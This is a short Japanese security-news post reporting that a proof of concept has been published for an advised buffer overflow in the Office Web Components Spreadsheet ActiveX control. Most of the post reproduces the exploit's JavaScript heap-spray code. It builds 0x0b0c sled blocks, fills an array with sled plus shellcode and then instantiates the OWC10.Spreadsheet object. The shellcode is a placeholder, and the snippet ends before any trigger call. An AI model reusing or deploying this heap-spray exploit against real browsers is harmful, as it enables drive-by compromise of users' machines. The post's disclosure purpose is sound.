Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC(情報元のブックマーク数)

IT セキュリティ

アドバイザリが出ているOffice Web Componentsの脆弱性のPoCが出ています。

<!-- http://en.securitylab.ru/poc/extra/382458.php -->
<html>
<body>
<script language="JavaScript">
var shellcode = unescape("evil code");
var array = new Array();
var ls = 0x81000-(shellcode.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{bigblock+=bigblock;}
var lh = bigblock.substring(0,ls/2);
delete bigblock;
for(i=0;i<0x99*2;i++) {
array[i] = lh + lh + shellcode;
}
CollectGarbage();
var obj = new ActiveXObject("OWC10.Spreadsheet");

screenshot